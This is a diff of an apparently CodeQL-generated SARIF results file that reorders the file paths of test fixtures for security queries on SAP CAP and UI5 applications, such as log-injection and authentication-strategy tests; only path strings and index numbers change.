@@ -4166,7 +4166,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 46 } @@ -4192,7 +4192,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", "uriBaseId" : "%SRCROOT%", "index" : 47 } @@ -4218,7 +4218,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 48 } @@ -4244,7 +4244,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", "uriBaseId" : "%SRCROOT%", "index" : 49 } @@ -4270,7 +4270,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 50 } 
@@ -4296,7 +4296,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 51 } @@ -4322,7 +4322,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 52 } @@ -4478,7 +4478,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 58 } @@ -4504,7 +4504,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 59 } @@ -4582,7 +4582,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", "uriBaseId" : "%SRCROOT%", "index" : 62 } 
@@ -4608,7 +4608,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", "uriBaseId" : "%SRCROOT%", "index" : 63 } @@ -4686,7 +4686,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 66 } @@ -4712,7 +4712,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 67 } @@ -4816,7 +4816,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 71 } @@ -4842,7 +4842,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 72 } 
@@ -4868,7 +4868,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 73 } @@ -4894,7 +4894,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 74 } @@ -4920,7 +4920,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 75 } @@ -4946,7 +4946,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", "uriBaseId" : "%SRCROOT%", "index" : 76 } @@ -5050,7 +5050,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 80 } 
@@ -5076,9 +5076,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 1 + "index" : 81 } } } ], @@ -5102,9 +5102,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", "uriBaseId" : "%SRCROOT%", - "index" : 81 + "index" : 1 } } } ], @@ -5232,7 +5232,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 86 } @@ -5258,7 +5258,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 87 } @@ -5310,7 +5310,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 88 } 
@@ -5388,7 +5388,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 91 } @@ -5414,7 +5414,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 92 } @@ -5440,7 +5440,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 93 } @@ -5466,7 +5466,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 94 } @@ -5492,7 +5492,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 95 } 
@@ -5518,7 +5518,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 96 } @@ -5570,7 +5570,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", "index" : 98 } @@ -5596,7 +5596,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 99 } @@ -5622,7 +5622,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 100 } @@ -5648,7 +5648,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 101 } 
@@ -5674,7 +5674,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 102 } @@ -5700,7 +5700,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", "index" : 103 } @@ -5726,7 +5726,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 104 } @@ -5752,7 +5752,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 105 } @@ -5778,7 +5778,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 106 } 
@@ -5804,7 +5804,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 107 } @@ -5830,7 +5830,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 108 } @@ -5856,7 +5856,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 109 } @@ -5908,7 +5908,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", "uriBaseId" : "%SRCROOT%", "index" : 111 } @@ -5934,7 +5934,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 112 } 
@@ -5960,7 +5960,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 113 } @@ -5986,7 +5986,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 114 } @@ -6012,7 +6012,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 115 } @@ -6038,7 +6038,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 116 } @@ -6116,7 +6116,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 119 } @@ -6142,7 +6142,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 120 } 
@@ -6168,7 +6168,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 121 } @@ -6194,7 +6194,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", "uriBaseId" : "%SRCROOT%", "index" : 122 } @@ -6220,7 +6220,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", "uriBaseId" : "%SRCROOT%", "index" : 123 } @@ -6246,7 +6246,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", "uriBaseId" : "%SRCROOT%", "index" : 124 } @@ -6428,7 +6428,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 131 } @@ -6454,7 +6454,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 132 } @@ -6480,7 +6480,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", "uriBaseId" : "%SRCROOT%", "index" : 133 } 
@@ -6506,7 +6506,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", "uriBaseId" : "%SRCROOT%", "index" : 134 } @@ -7260,7 +7260,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 163 } @@ -7286,7 +7286,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 164 } @@ -7312,7 +7312,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 165 } @@ -7338,7 +7338,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 166 } 
@@ -7364,9 +7364,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", "uriBaseId" : "%SRCROOT%", - "index" : 167 + "index" : 3 } } } ], @@ -7390,9 +7390,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 168 + "index" : 167 } } } ], @@ -7416,9 +7416,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 3 + "index" : 168 } } } ], @@ -7572,7 +7572,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 174 } @@ -7598,7 +7598,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 175 } 
@@ -7624,7 +7624,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 176 } @@ -7676,7 +7676,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 178 } @@ -7702,7 +7702,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 179 } @@ -7728,7 +7728,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 180 } @@ -7754,7 +7754,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 181 } 
@@ -7780,7 +7780,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 182 } @@ -7806,7 +7806,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 183 } @@ -7832,7 +7832,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 184 } @@ -7858,7 +7858,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 185 } @@ -7910,7 +7910,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", "uriBaseId" : "%SRCROOT%", "index" : 187 } 
@@ -7936,7 +7936,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 188 } @@ -7962,7 +7962,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 189 } @@ -7988,7 +7988,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 190 } @@ -8014,7 +8014,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 191 } @@ -8040,7 +8040,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", 